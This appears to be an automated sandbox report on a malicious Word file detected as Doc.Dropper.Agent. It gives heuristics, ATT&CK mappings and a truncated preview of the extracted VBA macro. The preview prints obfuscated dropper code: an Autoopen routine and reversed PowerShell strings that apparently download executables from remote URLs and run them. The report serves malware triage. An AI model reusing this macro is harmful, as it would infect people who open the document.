MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6544797-0. It contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This strongly suggests the macro is designed to execute a command, likely to download and run a secondary malicious payload. The specific payload or its distribution URL was not directly extractable from the provided evidence.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6544797-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6544797-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 120387 bytes |
SHA-256: 56371932e305cd1676939c237e792e0f19bb83861422a7478b8ec419f3bb574c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OnBfUuKPAG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nqECF(wzPVrK)
hLYCfo = ONTDU
zIqYrj = sQTSA
WQwOWY = quMFEQ + Sgn(4970 - CZWAhL - qIqiKE + Fix(7982)) - 33047 - CDbl(84675)
BqRrQ = 98173
End Sub
Sub foDDvl(aidqr)
RTdtap = sOcmd
zCakk = aZVtIa
XWDfaN = voiMYR + Sgn(51847 - FRLQZb - RzttER + Fix(44828)) - 93403 - CDbl(49207)
SfSBo = 66132
YDZKT = MSLwU
hsASl = DmjJJ
rJrFm = aQiJr + Sgn(43106 - bzlhb - SDsrdS + Fix(24780)) - 63574 - CDbl(91412)
wVPuBS = 21012
GjCYD = XAiQJ
REFQq = zROnZ
iimocc = ImOav + Sgn(82465 - zWTcow - nTrPw + Fix(6430)) - 62583 - CDbl(36868)
JTHauY = 67541
End Sub
Sub XBPAVD(KZzVcz)
wcErLv = iYUps
HnQwa = kFmhWR
MFYFK = wXUiWD + Sgn(26648 - JsduLc - XWJzvp + Fix(23939)) - 60596 - CDbl(23441)
hZviTF = 37108
zwjmJ = vMzbMJ
LpRpjP = PAjsI
oiSFqn = kLjRk + Sgn(24930 - DiplS - IVjit + Fix(70416)) - 81264 - CDbl(25171)
wModaF = 32838
End Sub
Sub Autoopen()
On Error Resume Next
ulZzBz = zEWAC
KwZFaT = oMFwwr
TdHmJ = pvAsDG + Sgn(41887 - ioOpKM - OOXzmW + Fix(9750)) - 66181 - CDbl(61086)
CKmqVz = 67865
YHKYKmw (PrPwhC + zYoPjqwo + zTJXq)
miZEO = nWQkMU
AvikJ = fwvVYP
VipDvK = WQjNlG + Sgn(26724 - UzHCiR - YOiAj + Fix(22632)) - 16255 - CDbl(81853)
BohNI = 64984
End Sub
Sub oBftk(VzCdj)
wNVlPU = aUuid
ZXMwZ = mmmTA
YQJtjz = ciuvf + Sgn(5993 - tCHst - CfKrI + Fix(5618)) - 56943 - CDbl(56013)
sJuUnq = 7099
hlzbAj = cjtGHk
uZdwtG = kjUZf
kBLQbp = ZGwvB + Sgn(91962 - PbJWVM - OUqqz + Fix(94844)) - 57996 - CDbl(93818)
dCVzu = 51673
dfRiF = ciuzbD
WzDTZ = jVZds
cCTtjw = oHjrDi + Sgn(13441 - sIwAVa - hfwCYY + Fix(89557)) - 99066 - CDbl(7757)
ZCdlJ = 78839
End Sub
Sub zrOBq(zkSuo)
ddWBo = nuiZM
Hcqijd = iThBiM
rawRGd = maXDB + Sgn(77572 - VukZf - tOPVE + Fix(77307)) - 10365 - CDbl(10055)
vcroCc = 26295
End Sub
Attribute VB_Name = "MSinVBSafpYNZz"
Sub zqscKc(SYBsf)
MMmoHw = GwhYN
vZwhrU = BrwJAC
zAKmc = XOSDj + Sgn(10805 - ZUDIUP - hnTqJ + Fix(46846)) - 65282 - CDbl(88734)
OcoFi = 46729
End Sub
Function zYoPjqwo()
On Error Resume Next
mvwrZ = GvzmtX
oppkol = jTcDn
tEauAw = ORNXY + Sgn(78533 - hYsXi - NjYnE + Fix(31646)) - 87487 - CDbl(24493)
STsDw = 76623
lUXFfR = NVmGib
cSZZzw = aXHbif
hJami = jEzbV + Sgn(97831 - VjIao - IstBiS + Fix(65832)) - 13118 - CDbl(21358)
PiAmLf = 21878
RsvhJMiKd = rMUGYw("@0e'+'rof;)b3feb3f+b'+'3fxe.b3f'+'( +'+' BSNSgX +'+' b3fy'+'Udb'+'3f'+' +'+' '+'c'+'ilbup:vneSgX = CDSSgX;)b3f@b3f(tilpS'+'.b3f'+'nray.6ohu=l?php.v'+'tset/'+FTok", 65802 + 5 - 65802, 65802 + 155 - 65802)
TzMEY = wDwhR
OjnvWW = IsUwHY
jzUME = UzHpWE + Sgn(39289 - DiTApQ - iqFPpr + Fix(5190)) - 36425 - CDbl(98253)
FfQjA = 67161
jAcVV = JjdzM
HcsIj = irhXCo
tmfjh = jqhjo + Sgn(72554 - mNHfi - lPvpaQ + Fix(42687)) - 59435 - CDbl(56547)
fMznR = 52065
UjLRXffPIP = rMUGYw("iG2t( & | )29]RaHC[,'yUd' EcALpeR- 69]RaHC[,'eDp' EcaLpo9P", 73024 + 4 - 73024, 73024 + 52 - 73024)
izvqcS = tEWawQ
CtICow = EPLiGp
XqzqK = cfiDJz + Sgn(40819 - VtvjMQ - Solccp + Fix(49558)) - 68060 - CDbl(69598)
WcYWN = 48283
wMjicJ = zHwIp
TFjuWl = TMPMO
GnjUt = rWFrri + Sgn(71497 - EiTisP - DKmCw + Fix(67708)) - 29561 - CDbl(30264)
wWQTDi = 32402
fCFEUjZi = rMUGYw("tjUza'NUH/moc.'+'4'+'8wqgd5wqtg//'+':p'+'tth '+' b3f'+' = '+'XC'G", 69273 + 2 - 69273, 69273 + 59 - 69273)
DQwROO = MkoJks
TzrCcu = zIcGS
USRsZR = acRApw + Sgn(95055 - LuFftL - QbBBW + Fix(41709)) - 12549 - CDbl(13751)
KvTUt = 36552
SFDDV = zcvGX
YEPvJp = IsvjTQ
QbdwU = BAZXzI + Sgn(3526 - ssruwM - YiTrYN + Fix(51418)) - 22347 - CDbl(43545)
jmPzY = 97739
swQVoU = rMUGYw("tomen'+'b3'+'f(.'+' = '+'U'+'YY'+'SgX;modnar'+' )b3ftb3f+b'+'3f'+'cejbo-wb'+'3f+'+'b3f'+'eb3f+b3fnb3'+'f(& = dsa'+'dasn'+'Sg'+'X'((pUsAY", 91419 + 6 - 91419, 91419 + 128 - 91419)
ltqYfs = AosQAE
XDKrwK = wQaoC
PWmnT = tICWXt + Sgn(72474 - rkUKL - jMiFH + Fix(52461)) - 78002 - CDbl(83626)
dP
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.